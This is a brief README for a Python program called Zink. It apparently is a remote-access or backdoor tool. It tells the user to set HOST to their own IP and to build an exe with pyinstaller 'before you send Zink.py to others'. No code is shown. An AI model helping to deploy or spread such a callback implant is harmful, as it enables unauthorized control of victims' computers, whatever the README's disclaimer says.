GreshAnt/Zink/README.md

 This program is for learning purposes only.
 Please do not use it for illegal activities.
 You will be responsible for the consequences.

+-> In the file 'Zink.py', please fill HOST with your computer's IPv4, maybe you have to use DDNS. <-

+-> Before you send Zink.py to others, please use pyinstaller to make it be a exe file that others can run it on their computer without python. <-

 ## Features